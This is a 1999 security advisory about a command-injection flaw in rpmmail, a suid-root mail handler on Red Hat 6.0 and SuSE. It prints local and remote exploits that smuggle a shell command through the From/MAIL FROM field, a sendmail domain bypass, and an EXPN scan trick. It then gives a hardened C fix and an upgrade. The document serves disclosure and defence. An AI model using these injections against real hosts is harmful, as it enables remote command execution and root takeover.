COMMAND
rpmmail
SYSTEMS AFFECTED
RedHat 6.0, SuSE
PROBLEM
Brock Tellier found the following. A vulnerability exists in the
rpmmail package distributed on the Red Hat 6.0 Extra Applications
CD. The potential compromise for this bug could be remote or
local root, or simply remote command execution as "nobody" or
similar, depending on your system configuration.
By sending a carefully crafted mail message to
rpmmail@vulnerablehost, you can get /home/rpmmail/rpmmail (suid
root by default, exec'd remotely via .forward) to system(3) any
command you wish. The command executed does not necessarily run
with root privs, because bash drops privileges when the euid does
not match the uid of the caller. Although system(3) calls
/bin/sh -c, /bin/sh is linked by default (can anyone verify these?)
on some Linux systems, such as SuSE 6.2, to /bin/bash v2. From the
system(3) man page:
system() will not, in fact, work properly from programs with
suid or sgid privileges on systems on which /bin/sh is bash
version 2, since bash 2 drops privileges on startup.
(Debian uses a modified bash which does not do this when
invoked as sh.)
Thus some systems with rpmmail installed are vulnerable to
local/remote root, all others to remote command execution as an
unpriv'd user. The local exploit is as follows:
/bin/sh is linked to /bin/bash (default SuSE 6.2 behavior):
bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 9 Oct 5 11:27 /bin/sh -> /bin/bash
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: command not found
uid=100(xnec) gid=100(users) groups=100(users)
Could not open acknowledge file!
bash-2.03$
After linking /bin/sh to /bin/ksh instead:
bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 8 Oct 5 11:09 /bin/sh -> /bin/ksh
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: not found
uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100(users)
Could not open acknowledge file!
bash-2.03$
The remote exploit is merely:
bash-2.03$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500 (CDT)
MAIL FROM: ;/command/to/execute;
250 <;/command/to/execute;> ... Sender Okay
RCPT TO: rpmmail
250 <rpmmail> ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Btw, without a domain this won't work with sendmail. So, here's
the trick:
MAIL FROM: ;/command/to/execute;
553 ;/command/to/execute;... Domain name required
MAIL FROM: ;/command/to/execute;@microsoft.com
250 ;/command/to/execute;@microsoft.com... Sender ok
A remote scan for hosts vulnerable to this problem would be simple
as well, since EXPN can be used to verify the existence of the
.forward file:
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:38:44 -0500 (CDT)
EXPN rpmmail
250 "| /home/rpmmail/rpmmail -c /home/rpmmail/rpmmail.conf"
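The root cause above is a mail header value spliced into a system(3) command line. The following is an added example, not rpmmail's own code: a C handler that extracts the From: value, validates it against a strict whitelist and places it into an argv array for execv(2) so that no shell ever parses it. The /bin/mail acknowledgement command and the header layout are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define MAX_ADDR 255

/* Copy the value of the message's "From:" header into out.
 * Returns 1 on success, 0 if the header is missing, empty or too long. */
static int extract_from(const char *msg, char *out, size_t outlen)
{
    const char *p = msg;
    for (;;) {
        if (strncasecmp(p, "From:", 5) == 0) break;
        p = strchr(p, '\n');
        if (!p) return 0;
        p++;
    }
    p += 5;
    while (*p == ' ' || *p == '\t') p++;
    size_t n = strcspn(p, "\r\n");
    if (n == 0 || n >= outlen) return 0;   /* refuse, never truncate */
    memcpy(out, p, n);
    out[n] = '\0';
    return 1;
}

/* Whitelist check: only characters of a plain user@host address pass.
 * Shell metacharacters (; | & ` $ ( ) < > space ...) are rejected, so a
 * sender such as ";/usr/bin/id;" can never smuggle a second command. */
static int sender_is_safe(const char *from)
{
    size_t len = strlen(from);
    if (len == 0 || len > 254) return 0;
    for (const char *c = from; *c; c++) {
        unsigned char ch = (unsigned char)*c;
        if (!(isalnum(ch) || strchr("@._+-", ch))) return 0;
    }
    return strchr(from, '@') != NULL;       /* require user@host form */
}

/* Hardened dispatch: validate the From: value and put it into argv as ONE
 * element for execv(2) (after setuid(getuid()) in a suid program), so the
 * sender text is data, not part of a shell command line.  Returns 0 when
 * accepted (argv filled, NULL-terminated), -1 if there is no usable From:
 * header, -2 if the sender fails validation.  /bin/mail is assumed. */
static int prepare_ack_command(const char *msg, char *from, size_t fromlen,
                               const char *argv[5])
{
    if (!extract_from(msg, from, fromlen)) return -1;
    if (!sender_is_safe(from)) return -2;
    argv[0] = "/bin/mail"; argv[1] = "-s"; argv[2] = "rpmmail ack";
    argv[3] = from; argv[4] = NULL;
    return 0;
}
```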
SOLUTION
This was fixed and a new version is available on the FTP site:
ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4.tar.gz
or
ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4-2.i386.rpm
Btw, rpmmail is distributed on the RH6.0 Extra Applications CD.
You can, of course, install rpmmail on any other Linux variant,
such as SuSE, which is what was done above.